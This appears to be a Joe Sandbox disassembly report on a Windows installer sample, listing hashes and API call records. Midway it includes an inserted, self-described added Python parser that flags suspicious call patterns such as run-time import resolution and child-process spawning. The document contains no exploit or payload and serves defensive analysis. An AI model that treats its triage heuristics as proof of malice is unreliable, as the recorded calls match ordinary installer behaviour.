                                                                              • Opcode ID: 98c4159c357ba624018b5095eca27885fab0bd25fe2865ee120464a1d56055ca
                                                                              • Instruction ID: 23eb90ac0865fb6649058132ab0dcd5e2738ee5152c03834e0ad15106694cca9
                                                                              • Opcode Fuzzy Hash: 98c4159c357ba624018b5095eca27885fab0bd25fe2865ee120464a1d56055ca
                                                                              • Instruction Fuzzy Hash: B4412775608505EFCB10CF9DC6808AABBF5FB48320BB5C996E848DB719D338EE419B54
                                                                              APIs
                                                                              • ArcFourCrypt._ISCRYPT(?,?,?,?), ref: 0045C967
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: CryptFour
                                                                              • String ID:
                                                                              • API String ID: 2153018856-0
                                                                              • Opcode ID: 652ca7e95d520f478db864d31e1c50fd1cbe8d8ffee6081fd2562b398a9281da
                                                                              • Instruction ID: 196b54fe7aa8ab1053afe2cffafcf6ed6da51dc24599f2bb869cb02721a3a021
                                                                              • Opcode Fuzzy Hash: 652ca7e95d520f478db864d31e1c50fd1cbe8d8ffee6081fd2562b398a9281da
                                                                              • Instruction Fuzzy Hash: 7EC09BF240420CBF65005795FCC9C77F75CE65C6647408126F60442101D671AC1045B4
                                                                              APIs
                                                                              • ArcFourCrypt._ISCRYPT(?,00000000,00000000,000003E8,0046CB48,?,0046CD29), ref: 0045C97A
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: CryptFour
                                                                              • String ID:
                                                                              • API String ID: 2153018856-0
                                                                              • Opcode ID: 94da5b28650a6231c2ea90e9e727fe7b396b15a16109e44d83a51c1f6f4de3e0
                                                                              • Instruction ID: f930510039fdc8c4d2d2d599ed284be9893e60875d5d975e013ee6f81a6adef0
                                                                              • Opcode Fuzzy Hash: 94da5b28650a6231c2ea90e9e727fe7b396b15a16109e44d83a51c1f6f4de3e0
                                                                              • Instruction Fuzzy Hash: E8A002B0E80300BAFD3057706E0EF37252CD7D4F01F208465B211A91D4C6A46404857C
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2939742508.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000001.00000002.2939718755.0000000010000000.00000002.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000001.00000002.2939765016.0000000010002000.00000002.00000001.01000000.00000007.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_10000000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 550b9f88123d0c3b213a5d4b99e682963a3eaac5120c60ac7846f9a0f3bba5ba
                                                                              • Instruction ID: 1c94840b05858ddf3503627acbaac9226f9c4a6e1659969bf0a936c2f155f8a0
                                                                              • Opcode Fuzzy Hash: 550b9f88123d0c3b213a5d4b99e682963a3eaac5120c60ac7846f9a0f3bba5ba
                                                                              • Instruction Fuzzy Hash: FF11303254D3D28FC305CF2894506D6FFE4AF6A640F194AAEE1D45B203C2659549C7A2
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2939742508.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000001.00000002.2939718755.0000000010000000.00000002.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000001.00000002.2939765016.0000000010002000.00000002.00000001.01000000.00000007.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_10000000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: aff350dcda9d135b5489d453054620cf61adfe11cc5af5bb48cdce25d513e1a9
                                                                              • Instruction ID: 837d35c9df4effc004866add7a9100bdfed479f04b3922bb4bd4c5469ecd81ba
                                                                              • Opcode Fuzzy Hash: aff350dcda9d135b5489d453054620cf61adfe11cc5af5bb48cdce25d513e1a9
                                                                              • Instruction Fuzzy Hash:
                                                                              APIs
                                                                              • CreateMutexA.KERNEL32(00498AE4,00000001,00000000,00000000,00457875,?,?,?,00000001,?,00457A8F,00000000,00457AA5,?,00000000,0049A628), ref: 0045758D
                                                                              • CreateFileMappingA.KERNEL32(000000FF,00498AE4,00000004,00000000,00002018,00000000), ref: 004575C5
                                                                              • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00002018,00000000,0045784B,?,00498AE4,00000001,00000000,00000000,00457875,?,?,?), ref: 004575EC
                                                                              • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,04000000,00000000,00000000,00000044,?), ref: 004576F9
                                                                              • ReleaseMutex.KERNEL32(00000000,00000000,00000002,00000000,00000000,00002018,00000000,0045784B,?,00498AE4,00000001,00000000,00000000,00457875), ref: 00457651
                                                                                • Part of subcall function 00452AFC: GetLastError.KERNEL32(00000000,0045356D,00000005,00000000,004535A2,?,?,00000000,0049A628,00000004,00000000,00000000,00000000,?,00496869,00000000), ref: 00452AFF
                                                                              • CloseHandle.KERNEL32(00457A8F,00000000,00000000,00000000,00000000,00000001,04000000,00000000,00000000,00000044,?), ref: 00457710
                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF,00457A8F,00000000,00000000,00000000,00000000,00000001,04000000,00000000,00000000,00000044,?), ref: 00457749
                                                                              • GetLastError.KERNEL32(00000000,000000FF,00457A8F,00000000,00000000,00000000,00000000,00000001,04000000,00000000,00000000,00000044,?), ref: 0045775B
                                                                              • UnmapViewOfFile.KERNEL32(00000000,00457852,00000000,00000000,00000000,00000000,00000001,04000000,00000000,00000000,00000044,?), ref: 0045782D
                                                                              • CloseHandle.KERNEL32(00000000,00457852,00000000,00000000,00000000,00000000,00000001,04000000,00000000,00000000,00000044,?), ref: 0045783C
                                                                              • CloseHandle.KERNEL32(00000000,00457852,00000000,00000000,00000000,00000000,00000001,04000000,00000000,00000000,00000044,?), ref: 00457845
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: CloseCreateFileHandle$ErrorLastMutexView$MappingObjectProcessReleaseSingleUnmapWait
                                                                              • String ID: CreateFileMapping$CreateMutex$CreateProcess$D$GetProcAddress$LoadLibrary$MapViewOfFile$OleInitialize$REGDLL failed with exit code 0x%x$REGDLL mutex wait failed (%d, %d)$REGDLL returned unknown result code %d$ReleaseMutex$Spawning _RegDLL.tmp$_RegDLL.tmp %u %u$_isetup\_RegDLL.tmp
                                                                              • API String ID: 4012871263-351310198
                                                                              • Opcode ID: b8857b922522f3f755a45729126c2f0d9cd80f0de934d6ab31d5c47b9e38ba38
                                                                              • Instruction ID: 9fa33364040fb067cffbf7544db289955a363cad08101e599f84dfab4c508334
                                                                              • Opcode Fuzzy Hash: b8857b922522f3f755a45729126c2f0d9cd80f0de934d6ab31d5c47b9e38ba38
                                                                              • Instruction Fuzzy Hash: D7916370A042059FDB10EBA9D845B9EB7B5EB08305F10857BE814EB383DB789948CF69
                                                                              APIs
                                                                              • GetVersion.KERNEL32(?,00419000,00000000,?,?,?,00000001), ref: 0041F136
                                                                              • SetErrorMode.KERNEL32(00008000,?,00419000,00000000,?,?,?,00000001), ref: 0041F152
                                                                              • LoadLibraryA.KERNEL32(CTL3D32.DLL,00008000,?,00419000,00000000,?,?,?,00000001), ref: 0041F15E
                                                                              • SetErrorMode.KERNEL32(00000000,CTL3D32.DLL,00008000,?,00419000,00000000,?,?,?,00000001), ref: 0041F16C
                                                                              • GetProcAddress.KERNEL32(00000001,Ctl3dRegister), ref: 0041F19C
                                                                              • GetProcAddress.KERNEL32(00000001,Ctl3dUnregister), ref: 0041F1C5
                                                                              • GetProcAddress.KERNEL32(00000001,Ctl3dSubclassCtl), ref: 0041F1DA
                                                                              • GetProcAddress.KERNEL32(00000001,Ctl3dSubclassDlgEx), ref: 0041F1EF
                                                                              • GetProcAddress.KERNEL32(00000001,Ctl3dDlgFramePaint), ref: 0041F204
                                                                              • GetProcAddress.KERNEL32(00000001,Ctl3dCtlColorEx), ref: 0041F219
                                                                              • GetProcAddress.KERNEL32(00000001,Ctl3dAutoSubclass), ref: 0041F22E
                                                                              • GetProcAddress.KERNEL32(00000001,Ctl3dUnAutoSubclass), ref: 0041F243
                                                                              • GetProcAddress.KERNEL32(00000001,Ctl3DColorChange), ref: 0041F258
                                                                              • GetProcAddress.KERNEL32(00000001,BtnWndProc3d), ref: 0041F26D
                                                                              • FreeLibrary.KERNEL32(00000001,?,00419000,00000000,?,?,?,00000001), ref: 0041F27F
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: AddressProc$ErrorLibraryMode$FreeLoadVersion
                                                                              • String ID: BtnWndProc3d$CTL3D32.DLL$Ctl3DColorChange$Ctl3dAutoSubclass$Ctl3dCtlColorEx$Ctl3dDlgFramePaint$Ctl3dRegister$Ctl3dSubclassCtl$Ctl3dSubclassDlgEx$Ctl3dUnAutoSubclass$Ctl3dUnregister
                                                                              • API String ID: 2323315520-3614243559
                                                                              • Opcode ID: 51cb45610875762faf6d6cb9dc15dbb0f4a8b87cdd32b8fce74619213e256557
                                                                              • Instruction ID: cf5be9d6f1a649145535b6a7131e14805afeac8bde6fe10f2a473d18be96f611
                                                                              • Opcode Fuzzy Hash: 51cb45610875762faf6d6cb9dc15dbb0f4a8b87cdd32b8fce74619213e256557
                                                                              • Instruction Fuzzy Hash: D63110B1640700EBDF00EBF9AC86A653294F729724745093FB648DB192DB7E485ECB1D
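The two records above (the function that creates a mutex and a file mapping and then spawns _RegDLL.tmp, and the function that loads CTL3D32.DLL and resolves its exports one GetProcAddress at a time) are the kind of call sequence an analyst picks out by hand from a report like this. The following Python parser is an added example, not part of the Joe Sandbox report or its IDA plugin output: it reads records in the report's `API.MODULE(args), ref: addr` form, including the indented "Part of subcall function" lines, and flags three patterns in each record: a LoadLibrary followed by GetProcAddress with literal export names (imports resolved at run time), SetErrorMode with the SEM_NOOPENFILEERRORBOX bit (0x8000) set so a failed load shows no dialog, and a file mapping created and mapped before CreateProcess (a section handed to a child). The sample text is constructed from the two records above with their argument lists shortened; the pattern names, the regular expression and the ordering check by call-site address are the example's own choices.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed sample: the two API records above, copied from this report with
# their argument lists shortened. "?" is the report's marker for an unresolved argument.
SAMPLE = """\
APIs
• CreateMutexA.KERNEL32(00498AE4,00000001,00000000,00000000,00457875,?), ref: 0045758D
• CreateFileMappingA.KERNEL32(000000FF,00498AE4,00000004,00000000,00002018,00000000), ref: 004575C5
• MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00002018,00000000), ref: 004575EC
• CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,04000000,00000000,00000000,00000044,?), ref: 004576F9
• ReleaseMutex.KERNEL32(00000000,00000000,00000002), ref: 00457651
  • Part of subcall function 00452AFC: GetLastError.KERNEL32(00000000,0045356D), ref: 00452AFF
• WaitForSingleObject.KERNEL32(00000000,000000FF,00457A8F), ref: 00457749
• UnmapViewOfFile.KERNEL32(00000000,00457852), ref: 0045782D
APIs
• GetVersion.KERNEL32(?,00419000,00000000,?,?,?,00000001), ref: 0041F136
• SetErrorMode.KERNEL32(00008000,?,00419000,00000000), ref: 0041F152
• LoadLibraryA.KERNEL32(CTL3D32.DLL,00008000,?,00419000), ref: 0041F15E
• SetErrorMode.KERNEL32(00000000,CTL3D32.DLL,00008000,?), ref: 0041F16C
• GetProcAddress.KERNEL32(00000001,Ctl3dRegister), ref: 0041F19C
• GetProcAddress.KERNEL32(00000001,Ctl3dUnregister), ref: 0041F1C5
• GetProcAddress.KERNEL32(00000001,Ctl3dSubclassCtl), ref: 0041F1DA
• FreeLibrary.KERNEL32(00000001,?,00419000,00000000), ref: 0041F27F
"""

# One call line: optional "Part of subcall function XXXXXXXX:" prefix, then API.MODULE(args), ref: addr
CALL_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-F]{8})\s*$"
)
HEX_RE = re.compile(r"[0-9A-F]{8}")
SEM_NOOPENFILEERRORBOX = 0x8000  # SetErrorMode flag: no "file not found" dialog when a load fails


@dataclass
class Call:
    api: str
    module: str
    args: List[str]
    ref: int                          # call-site address from the "ref:" field
    subcall_of: Optional[int] = None  # set when the report marks the line as part of a subcall


def parse_records(text: str) -> List[List[Call]]:
    """Split report text into per-function records, one list of Calls per 'APIs' header."""
    records: List[List[Call]] = []
    current: Optional[List[Call]] = None
    for line in text.splitlines():
        if line.strip() == "APIs":
            current = []
            records.append(current)
            continue
        m = CALL_RE.match(line)
        if m and current is not None:
            args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
            current.append(Call(m["api"], m["mod"], args, int(m["ref"], 16),
                                int(m["sub"], 16) if m["sub"] else None))
    return records


def _literal(arg: str) -> bool:
    """True for a symbolic argument (DLL or export name), False for '?' or a hex value."""
    return arg != "?" and not HEX_RE.fullmatch(arg)


def _first_ref(calls: List[Call], prefix: str) -> Optional[int]:
    """Lowest call-site address of an API whose name starts with prefix, or None."""
    refs = [c.ref for c in calls if c.api.startswith(prefix)]
    return min(refs) if refs else None


def triage(calls: List[Call]) -> dict:
    """Flag the call patterns worth a second look in one record; {} means nothing matched."""
    findings: dict = {}
    libs = [c.args[0] for c in calls
            if c.api.startswith("LoadLibrary") and c.args and _literal(c.args[0])]
    exports = [c.args[1] for c in calls
               if c.api == "GetProcAddress" and len(c.args) > 1 and _literal(c.args[1])]
    if libs and exports:  # imports resolved at run time rather than through the import table
        findings["dynamic_resolution"] = {"libraries": libs, "exports": exports}
    if any(c.api == "SetErrorMode" and c.args and HEX_RE.fullmatch(c.args[0])
           and int(c.args[0], 16) & SEM_NOOPENFILEERRORBOX for c in calls):
        findings["error_box_suppressed"] = True
    mapping, view, spawn = (_first_ref(calls, "CreateFileMapping"),
                            _first_ref(calls, "MapViewOfFile"),
                            _first_ref(calls, "CreateProcess"))
    if None not in (mapping, view, spawn) and mapping < view < spawn:
        findings["shared_memory_child"] = True  # section created and mapped before the child is spawned
    return findings


if __name__ == "__main__":
    for i, rec in enumerate(parse_records(SAMPLE)):
        print(f"record {i}: {len(rec)} calls -> {triage(rec)}")
```

The export list the parser pulls out of the GetProcAddress arguments is the same set of names that appears under the record's String ID, so a mismatch between the two is a quick check that the argument recovery is reading the right slot. The ordering check uses the "ref:" call-site address as a stand-in for program order; it is good enough for straight-line code like these two functions but says nothing about loops or branches, which need the disassembly.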
                                                                              APIs
                                                                              • 73A1A570.USER32(00000000,?,0041A954,?), ref: 0041CA50
                                                                              • 73A24C40.GDI32(?,00000000,?,0041A954,?), ref: 0041CA5C
                                                                              • 73A26180.GDI32(0041A954,?,00000001,00000001,00000000,00000000,0041CC72,?,?,00000000,?,0041A954,?), ref: 0041CA80
                                                                              • 73A24C00.GDI32(?,0041A954,?,00000000,0041CC72,?,?,00000000,?,0041A954,?), ref: 0041CA90
                                                                              • SelectObject.GDI32(0041CE4C,00000000), ref: 0041CAAB
                                                                              • FillRect.USER32(0041CE4C,?,?), ref: 0041CAE6
                                                                              • SetTextColor.GDI32(0041CE4C,00000000), ref: 0041CAFB
                                                                              • SetBkColor.GDI32(0041CE4C,00000000), ref: 0041CB12
                                                                              • PatBlt.GDI32(0041CE4C,00000000,00000000,0041A954,?,00FF0062), ref: 0041CB28
                                                                              • 73A24C40.GDI32(?,00000000,0041CC2B,?,0041CE4C,00000000,?,0041A954,?,00000000,0041CC72,?,?,00000000,?,0041A954), ref: 0041CB3B
                                                                              • SelectObject.GDI32(00000000,00000000), ref: 0041CB6C
                                                                              • 73A18830.GDI32(00000000,00000000,00000001,00000000,00000000,00000000,0041CC1A,?,?,00000000,0041CC2B,?,0041CE4C,00000000,?,0041A954), ref: 0041CB84
                                                                              • 73A122A0.GDI32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,0041CC1A,?,?,00000000,0041CC2B,?,0041CE4C,00000000,?), ref: 0041CB8D
                                                                              • 73A18830.GDI32(0041CE4C,00000000,00000001,00000000,00000000,00000000,00000001,00000000,00000000,00000000,0041CC1A,?,?,00000000,0041CC2B), ref: 0041CB9C
                                                                              • 73A122A0.GDI32(0041CE4C,0041CE4C,00000000,00000001,00000000,00000000,00000000,00000001,00000000,00000000,00000000,0041CC1A,?,?,00000000,0041CC2B), ref: 0041CBA5
                                                                              • SetTextColor.GDI32(00000000,00000000), ref: 0041CBBE
                                                                              • SetBkColor.GDI32(00000000,00000000), ref: 0041CBD5
                                                                              • 73A24D40.GDI32(0041CE4C,00000000,00000000,0041A954,?,00000000,00000000,00000000,00CC0020,00000000,00000000,00000000,0041CC1A,?,?,00000000), ref: 0041CBF1
                                                                              • SelectObject.GDI32(00000000,?), ref: 0041CBFE
                                                                              • DeleteDC.GDI32(00000000), ref: 0041CC14
                                                                                • Part of subcall function 0041A068: GetSysColor.USER32(?), ref: 0041A072
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: Color$ObjectSelect$A122A18830Text$A26180A570DeleteFillRect
                                                                              • String ID:
                                                                              • API String ID: 1381628555-0
                                                                              • Opcode ID: aa3120a436c449d3c69836d856a65b18742abf0f47e61156e5e14d2e6b4a0b24
                                                                              • Instruction ID: 69ed6b4e4825e3c47d53d1ee88e95f0281db4649dcd7e45998b3becab3701dfd
                                                                              • Opcode Fuzzy Hash: aa3120a436c449d3c69836d856a65b18742abf0f47e61156e5e14d2e6b4a0b24
                                                                              • Instruction Fuzzy Hash: 6261EC71A44609AFDF10EBE9DC86F9FB7B8EF48704F14446AB504E7281D67CA9408B68
                                                                              APIs
                                                                              • ShowWindow.USER32(?,00000005,00000000,00496C2C,?,?,00000000,?,00000000,00000000,?,00496FE3,00000000,00496FED,?,00000000), ref: 00496917
                                                                              • CreateMutexA.KERNEL32(00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00496C2C,?,?,00000000,?,00000000,00000000,?,00496FE3,00000000), ref: 0049692A
                                                                              • ShowWindow.USER32(?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00496C2C,?,?,00000000,?,00000000,00000000), ref: 0049693A
                                                                              • MsgWaitForMultipleObjects.USER32(00000001,00000000,00000000,000000FF,000000FF), ref: 0049695B
                                                                              • ShowWindow.USER32(?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00496C2C,?,?,00000000,?,00000000), ref: 0049696B
                                                                                • Part of subcall function 0042D418: GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,0042D4A6,?,?,?,00000001,?,0045559A,00000000,00455602), ref: 0042D44D
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: ShowWindow$CreateFileModuleMultipleMutexNameObjectsWait
                                                                              • String ID: $pI$.lst$.msg$/REG$/REGU$Inno-Setup-RegSvr-Mutex$Setup$oI$oI
                                                                              • API String ID: 2000705611-3392794427
                                                                              • Opcode ID: a02d3fed669f7fb7c340bf5c1bb211ceb87890bb9eb81734911f04de300cbb5a
                                                                              • Instruction ID: 31cdb79ee62171b288e36ce2cb74f04ee829b5848567b5503989d80848a91494
                                                                              • Opcode Fuzzy Hash: a02d3fed669f7fb7c340bf5c1bb211ceb87890bb9eb81734911f04de300cbb5a
                                                                              • Instruction Fuzzy Hash: 1191D530A04255AFDF11EBA5C852BAF7FA4EB49304F528477F500AB2C2D67DAC05CB69
                                                                              APIs
                                                                              • GetLastError.KERNEL32(00000000,0045A0B4,?,?,?,?,?,00000006,?,00000000,00495CC7,?,00000000,00495D6A), ref: 00459F66
                                                                              Similarity
                                                                              • API ID: ErrorLast
                                                                              • String ID: .chm$.chw$.fts$.gid$.hlp$.lnk$Deleting file: %s$Failed to delete the file; it may be in use (%d).$Failed to strip read-only attribute.$Stripped read-only attribute.$The file appears to be in use (%d). Will delete on restart.
                                                                              • API String ID: 1452528299-3112430753
                                                                              • Opcode ID: b40920f120a9bf38da6ee553801966ffb6b78c7b5657bb9011c081c98828634e
                                                                              • Instruction ID: 69f6fbefbe6f055fc938da3b3950c8fb4cadcfc16d4dd4dc981ad9326b9f7ff7
                                                                              • Opcode Fuzzy Hash: b40920f120a9bf38da6ee553801966ffb6b78c7b5657bb9011c081c98828634e
                                                                              • Instruction Fuzzy Hash: 5D71B130B102049BCB00EF6998827AE77A5AF49716F50856BFC05DB383DB7C9E4D875A
                                                                              APIs
                                                                              • GetVersion.KERNEL32 ref: 0045C2FA
                                                                              • GetModuleHandleA.KERNEL32(advapi32.dll), ref: 0045C31A
                                                                              • GetProcAddress.KERNEL32(00000000,GetNamedSecurityInfoW), ref: 0045C327
                                                                              • GetProcAddress.KERNEL32(00000000,SetNamedSecurityInfoW), ref: 0045C334
                                                                              • GetProcAddress.KERNEL32(00000000,SetEntriesInAclW), ref: 0045C342
                                                                                • Part of subcall function 0045C1E8: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,0045C287,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0045C261
                                                                              • AllocateAndInitializeSid.ADVAPI32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,0045C535,?,?,00000000), ref: 0045C3FB
                                                                              • GetLastError.KERNEL32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,0045C535,?,?,00000000), ref: 0045C404
                                                                              Similarity
                                                                              • API ID: AddressProc$AllocateByteCharErrorHandleInitializeLastModuleMultiVersionWide
                                                                              • String ID: GetNamedSecurityInfoW$SetEntriesInAclW$SetNamedSecurityInfoW$W$advapi32.dll
                                                                              • API String ID: 59345061-4263478283
                                                                              • Opcode ID: 4113bb8dbcd17bfcbcc3a54e2f337fa89a8317241d30fe9918db60e1e55ed00a
                                                                              • Instruction ID: 8ce8c74b38915e38562a90fe4681b9431f62f8b5bebe6c1e41ffef27034fd0c0
                                                                              • Opcode Fuzzy Hash: 4113bb8dbcd17bfcbcc3a54e2f337fa89a8317241d30fe9918db60e1e55ed00a
                                                                              • Instruction Fuzzy Hash: DF5163B1900708EFDB10DFD9C881BAEB7B8EB4D711F14806AF905B7241D678A945CFA9
                                                                              APIs
                                                                              • 73A24C40.GDI32(00000000,?,00000000,?), ref: 0041B3D3
                                                                              • 73A24C40.GDI32(00000000,00000000,?,00000000,?), ref: 0041B3DD
                                                                              • GetObjectA.GDI32(?,00000018,00000004), ref: 0041B3EF
                                                                              • 73A26180.GDI32(0000000B,?,00000001,00000001,00000000,?,00000018,00000004,00000000,00000000,?,00000000,?), ref: 0041B406
                                                                              • 73A1A570.USER32(00000000,?,00000018,00000004,00000000,00000000,?,00000000,?), ref: 0041B412
                                                                              • 73A24C00.GDI32(00000000,0000000B,?,00000000,0041B46B,?,00000000,?,00000018,00000004,00000000,00000000,?,00000000,?), ref: 0041B43F
                                                                              • 73A1A480.USER32(00000000,00000000,0041B472,00000000,0041B46B,?,00000000,?,00000018,00000004,00000000,00000000,?,00000000,?), ref: 0041B465
                                                                              • SelectObject.GDI32(00000000,?), ref: 0041B480
                                                                              • SelectObject.GDI32(?,00000000), ref: 0041B48F
                                                                              • StretchBlt.GDI32(?,00000000,00000000,0000000B,?,00000000,00000000,00000000,?,?,00CC0020), ref: 0041B4BB
                                                                              • SelectObject.GDI32(00000000,00000000), ref: 0041B4C9
                                                                              • SelectObject.GDI32(?,00000000), ref: 0041B4D7
                                                                              • DeleteDC.GDI32(00000000), ref: 0041B4E0
                                                                              • DeleteDC.GDI32(?), ref: 0041B4E9
                                                                              Similarity
                                                                              • API ID: Object$Select$Delete$A26180A480A570Stretch
                                                                              • String ID:
                                                                              • API String ID: 359944910-0
                                                                              • Opcode ID: 2927a2be40f20d1df61f9808da4568e2b654a5b12de7d33a12a957fb8f1fb446
                                                                              • Instruction ID: 9e854467c286a28b18f31183f63f6c048648830cb6dea2264be82148a8da808a
                                                                              • Opcode Fuzzy Hash: 2927a2be40f20d1df61f9808da4568e2b654a5b12de7d33a12a957fb8f1fb446
                                                                              • Instruction Fuzzy Hash: DC419D71E40619AFDF10EAE9D846FAFB7B8EF08704F104466B614FB281D67969408BA4
                                                                              APIs
                                                                                • Part of subcall function 0042C7D0: GetFullPathNameA.KERNEL32(00000000,00001000,?), ref: 0042C7F4
                                                                              • WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00471CA0
                                                                              • SHChangeNotify.SHELL32(00000008,00000001,00000000,00000000), ref: 00471D9F
                                                                              • SHChangeNotify.SHELL32(00000002,00000001,00000000,00000000), ref: 00471DB5
                                                                              • SHChangeNotify.SHELL32(00001000,00001001,00000000,00000000), ref: 00471DDA
                                                                              Similarity
                                                                              • API ID: ChangeNotify$FullNamePathPrivateProfileStringWrite
                                                                              • String ID: .lnk$.pif$.url$Desktop.ini$Filename: %s$target.lnk${group}\
                                                                              • API String ID: 971782779-3668018701
